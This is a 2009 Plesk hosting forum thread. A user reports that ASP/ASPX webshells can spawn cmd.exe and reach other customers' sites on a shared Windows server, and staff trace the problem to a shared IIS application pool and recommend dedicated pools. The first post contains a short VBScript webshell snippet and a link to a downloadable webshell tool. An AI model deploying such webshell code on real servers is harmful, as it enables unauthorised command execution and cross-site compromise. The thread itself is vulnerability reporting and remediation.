1. Please take a little time for this simple survey! Thank you for participating!
    Dismiss Notice
  2. Dear Pleskians, please read this carefully! New attachments and other rules Thank you!
    Dismiss Notice
  3. Dear Pleskians, I really hope that you will share your opinion in this Special topic for chatter about Plesk in the Clouds. Thank you!
    Dismiss Notice

Server Plesk 9.2 Hacked

Discussion in 'Plesk 9.x for Windows Issue, Fixes, How-To' started by Nguyen Thang Long, Dec 24, 2009.

  1. Nguyen Thang Long

    Nguyen Thang Long Guest

    0
     
    I am testing plesk 9.2 on Windows server 2003.
    I tried hack this server by webshell (aspx & asp)
    Example:
    When i ran :
    <%@ Language=VBScript %>
    <%
    On Error Resume Next
    Dim oScript
    Dim gURL
    gURL = Request.ServerVariables("APPL_PHYSICAL_PATH")
    Set oScript = Server.CreateObject("WSCRIPT.SHELL")
    Call oScript.Run ("c:\\WINDOWS\\system32\\cmd.exe",1,True)
    %>

    Then task manager of server running file cmd.exe by users is : IWAM_Plesk(Default)
    Or when i used webshell (http://www.guru.net.vn/kshell_1.2.zip) , i can hacked website of other users in this server.
    I used plesk tools maked sure permission of server , but it is not fix that problems.

    I can't fix , who can secure , and fix that error ? Help me ?

    Thanks so much !
     
  2. IgorG

    IgorG Forums Analyst Staff Member

    49
    24%
    Joined:
    Oct 27, 2009
    Messages:
    24,572
    Likes Received:
    1,243
    Location:
    Novosibirsk, Russia
    I have reported this problem to developers with high priority. I will update this thread with results as soon as I receive it.
     
  3. Nguyen Thang Long

    Nguyen Thang Long Guest

    0
     
    Thanks to IgorG :)
     
  4. deepa

    deepa Basic Pleskian

    26
     
    Joined:
    Dec 26, 2005
    Messages:
    72
    Likes Received:
    0
    is this a security bug in plelsk 9.2?
     
  5. IgorG

    IgorG Forums Analyst Staff Member

    49
    24%
    Joined:
    Oct 27, 2009
    Messages:
    24,572
    Likes Received:
    1,243
    Location:
    Novosibirsk, Russia
    Problem still under developer's investigation. I will update thread as soon as I receive any useful information.
     
  6. IgorG

    IgorG Forums Analyst Staff Member

    49
    24%
    Joined:
    Oct 27, 2009
    Messages:
    24,572
    Likes Received:
    1,243
    Location:
    Novosibirsk, Russia
    This issue caused because of by default all users application works inside single AppPool. So they probably has access to each other contents.

    This issue can be resolved, if you set <domain> -> Web Hosting Settings -> 'Use dedicated pool' on every domain (you can use mass domains operations either). And additionally you can set Home -> IIS Application Pool -> Global Settings -> Always place all domains in the shared application pool option. It will run each site in separated pool, and their applications couldn't read each other.
     
Loading...